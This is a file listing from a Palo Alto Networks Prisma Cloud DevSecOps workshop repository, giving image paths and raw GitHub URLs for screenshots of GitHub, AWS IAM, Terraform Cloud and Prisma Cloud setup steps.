https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-action-commit.png -------------------------------------------------------------------------------- /guide/images/gh-action-edit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-action-edit.png -------------------------------------------------------------------------------- /guide/images/gh-actions-new-workflow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-actions-new-workflow.png -------------------------------------------------------------------------------- /guide/images/gh-actions-results.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-actions-results.png -------------------------------------------------------------------------------- /guide/images/gh-actions-tab.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-actions-tab.png -------------------------------------------------------------------------------- /guide/images/gh-actions-workflows.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-actions-workflows.png 
-------------------------------------------------------------------------------- /guide/images/gh-blocked-pr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-blocked-pr.png -------------------------------------------------------------------------------- /guide/images/gh-bp-rule.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-bp-rule.png -------------------------------------------------------------------------------- /guide/images/gh-branch-protection.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-branch-protection.png -------------------------------------------------------------------------------- /guide/images/gh-clone.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-clone.png -------------------------------------------------------------------------------- /guide/images/gh-commit-directly.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-commit-directly.png -------------------------------------------------------------------------------- /guide/images/gh-commit-s3-change.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-commit-s3-change.png -------------------------------------------------------------------------------- /guide/images/gh-create-fork.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-create-fork.png -------------------------------------------------------------------------------- /guide/images/gh-create-pr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-create-pr.png -------------------------------------------------------------------------------- /guide/images/gh-edit-checkov.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-edit-checkov.png -------------------------------------------------------------------------------- /guide/images/gh-edit-s3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-edit-s3.png -------------------------------------------------------------------------------- /guide/images/gh-fork.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-fork.png -------------------------------------------------------------------------------- 
/guide/images/gh-merge-pr-fix.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-merge-pr-fix.png -------------------------------------------------------------------------------- /guide/images/gh-new-file.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-new-file.png -------------------------------------------------------------------------------- /guide/images/gh-open-pr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-open-pr.png -------------------------------------------------------------------------------- /guide/images/gh-pr-fix1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-pr-fix1.png -------------------------------------------------------------------------------- /guide/images/gh-pr-fix2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-pr-fix2.png -------------------------------------------------------------------------------- /guide/images/gh-pr-merge.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-pr-merge.png 
-------------------------------------------------------------------------------- /guide/images/gh-pr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-pr.png -------------------------------------------------------------------------------- /guide/images/gh-prisma-comments.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-prisma-comments.png -------------------------------------------------------------------------------- /guide/images/gh-propose-changes.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-propose-changes.png -------------------------------------------------------------------------------- /guide/images/gh-secret-created.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-secret-created.png -------------------------------------------------------------------------------- /guide/images/gh-security-results.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-security-results.png -------------------------------------------------------------------------------- /guide/images/gh-select-repos.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/gh-select-repos.png -------------------------------------------------------------------------------- /guide/images/ghas-code-scanning-results.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/ghas-code-scanning-results.png -------------------------------------------------------------------------------- /guide/images/ghas-overview.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/ghas-overview.png -------------------------------------------------------------------------------- /guide/images/github-create-secret.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/github-create-secret.png -------------------------------------------------------------------------------- /guide/images/github-repo-secret.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/github-repo-secret.png -------------------------------------------------------------------------------- /guide/images/github-secrets.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/github-secrets.png 
-------------------------------------------------------------------------------- /guide/images/iam-console-home.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/iam-console-home.png -------------------------------------------------------------------------------- /guide/images/iam-create-key.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/iam-create-key.png -------------------------------------------------------------------------------- /guide/images/iam-create-user.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/iam-create-user.png -------------------------------------------------------------------------------- /guide/images/iam-dashboard.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/iam-dashboard.png -------------------------------------------------------------------------------- /guide/images/iam-key-created.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/iam-key-created.png -------------------------------------------------------------------------------- /guide/images/iam-key-options.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/iam-key-options.png -------------------------------------------------------------------------------- /guide/images/iam-key-tag-and-create.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/iam-key-tag-and-create.png -------------------------------------------------------------------------------- /guide/images/iam-retrieve-key-data.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/iam-retrieve-key-data.png -------------------------------------------------------------------------------- /guide/images/iam-review-create.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/iam-review-create.png -------------------------------------------------------------------------------- /guide/images/iam-set-perms.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/iam-set-perms.png -------------------------------------------------------------------------------- /guide/images/iam-user-details.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/iam-user-details.png 
-------------------------------------------------------------------------------- /guide/images/prisma-access-control.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-access-control.png -------------------------------------------------------------------------------- /guide/images/prisma-access-key-created.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-access-key-created.png -------------------------------------------------------------------------------- /guide/images/prisma-appsec-home.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-appsec-home.png -------------------------------------------------------------------------------- /guide/images/prisma-appsec-projects.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-appsec-projects.png -------------------------------------------------------------------------------- /guide/images/prisma-aws-added.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-aws-added.png -------------------------------------------------------------------------------- /guide/images/prisma-aws1.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-aws1.png -------------------------------------------------------------------------------- /guide/images/prisma-aws2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-aws2.png -------------------------------------------------------------------------------- /guide/images/prisma-aws3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-aws3.png -------------------------------------------------------------------------------- /guide/images/prisma-aws4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-aws4.png -------------------------------------------------------------------------------- /guide/images/prisma-cfn-output.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-cfn-output.png -------------------------------------------------------------------------------- /guide/images/prisma-cfn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-cfn.png 
-------------------------------------------------------------------------------- /guide/images/prisma-checkov-api-key.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-checkov-api-key.png -------------------------------------------------------------------------------- /guide/images/prisma-checkov-results.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-checkov-results.png -------------------------------------------------------------------------------- /guide/images/prisma-cicd-risks.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-cicd-risks.png -------------------------------------------------------------------------------- /guide/images/prisma-cloud-account.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-cloud-account.png -------------------------------------------------------------------------------- /guide/images/prisma-code-build-providers.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-code-build-providers.png -------------------------------------------------------------------------------- /guide/images/prisma-connect-providers.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-connect-providers.png -------------------------------------------------------------------------------- /guide/images/prisma-create-access-key.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-create-access-key.png -------------------------------------------------------------------------------- /guide/images/prisma-csp-onboarding.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-csp-onboarding.png -------------------------------------------------------------------------------- /guide/images/prisma-dashboard-code.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-dashboard-code.png -------------------------------------------------------------------------------- /guide/images/prisma-drift-result.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-drift-result.png -------------------------------------------------------------------------------- /guide/images/prisma-enforcement-rules.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-enforcement-rules.png -------------------------------------------------------------------------------- /guide/images/prisma-enforcement-rules1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-enforcement-rules1.png -------------------------------------------------------------------------------- /guide/images/prisma-enforcement-rules2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-enforcement-rules2.png -------------------------------------------------------------------------------- /guide/images/prisma-enforcement-rules3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-enforcement-rules3.png -------------------------------------------------------------------------------- /guide/images/prisma-gh-app-results.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-gh-app-results.png -------------------------------------------------------------------------------- /guide/images/prisma-gh-app.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-gh-app.png -------------------------------------------------------------------------------- /guide/images/prisma-gh-auth.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-gh-auth.png -------------------------------------------------------------------------------- /guide/images/prisma-gh-done.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-gh-done.png -------------------------------------------------------------------------------- /guide/images/prisma-gha-results.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-gha-results.png -------------------------------------------------------------------------------- /guide/images/prisma-inventory.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-inventory.png -------------------------------------------------------------------------------- /guide/images/prisma-pr-fix1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-pr-fix1.png 
-------------------------------------------------------------------------------- /guide/images/prisma-pr-fix2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-pr-fix2.png -------------------------------------------------------------------------------- /guide/images/prisma-providers.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-providers.png -------------------------------------------------------------------------------- /guide/images/prisma-sbom.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-sbom.png -------------------------------------------------------------------------------- /guide/images/prisma-select-repos.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-select-repos.png -------------------------------------------------------------------------------- /guide/images/prisma-tfc-done.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-tfc-done.png -------------------------------------------------------------------------------- /guide/images/prisma-tfc-org.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-tfc-org.png -------------------------------------------------------------------------------- /guide/images/prisma-tfc-rt.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-tfc-rt.png -------------------------------------------------------------------------------- /guide/images/prisma-tfc-token.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-tfc-token.png -------------------------------------------------------------------------------- /guide/images/prisma-tfc-workspace.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-tfc-workspace.png -------------------------------------------------------------------------------- /guide/images/prisma-traced-resource-policies.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-traced-resource-policies.png -------------------------------------------------------------------------------- /guide/images/prisma-welcome.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/prisma-welcome.png 
-------------------------------------------------------------------------------- /guide/images/tfc-add-github.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-add-github.png -------------------------------------------------------------------------------- /guide/images/tfc-add-repo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-add-repo.png -------------------------------------------------------------------------------- /guide/images/tfc-apply-run.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-apply-run.png -------------------------------------------------------------------------------- /guide/images/tfc-apply.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-apply.png -------------------------------------------------------------------------------- /guide/images/tfc-configure-variables.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-configure-variables.png -------------------------------------------------------------------------------- /guide/images/tfc-create-token.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-create-token.png -------------------------------------------------------------------------------- /guide/images/tfc-org-details.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-org-details.png -------------------------------------------------------------------------------- /guide/images/tfc-plan-running.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-plan-running.png -------------------------------------------------------------------------------- /guide/images/tfc-post-plan.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-post-plan.png -------------------------------------------------------------------------------- /guide/images/tfc-pr-fix.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-pr-fix.png -------------------------------------------------------------------------------- /guide/images/tfc-run-queued.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-run-queued.png -------------------------------------------------------------------------------- 
/guide/images/tfc-run-task-created.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-run-task-created.png -------------------------------------------------------------------------------- /guide/images/tfc-token-created.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-token-created.png -------------------------------------------------------------------------------- /guide/images/tfc-vars1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-vars1.png -------------------------------------------------------------------------------- /guide/images/tfc-vars2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-vars2.png -------------------------------------------------------------------------------- /guide/images/tfc-vcs-workflow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-vcs-workflow.png -------------------------------------------------------------------------------- /guide/images/tfc-welcome.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-welcome.png -------------------------------------------------------------------------------- /guide/images/tfc-workspace-created.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-workspace-created.png -------------------------------------------------------------------------------- /guide/images/tfc-workspace1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-workspace1.png -------------------------------------------------------------------------------- /guide/images/tfc-workspace2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-workspace2.png -------------------------------------------------------------------------------- /guide/images/tfc-workspace3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/tfc-workspace3.png -------------------------------------------------------------------------------- /guide/images/vscode-extension.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/PaloAltoNetworks/prisma-cloud-devsecops-workshop/8075e47bf2c89abcfa51f5cebc4bbd5a11d4c54a/guide/images/vscode-extension.png 
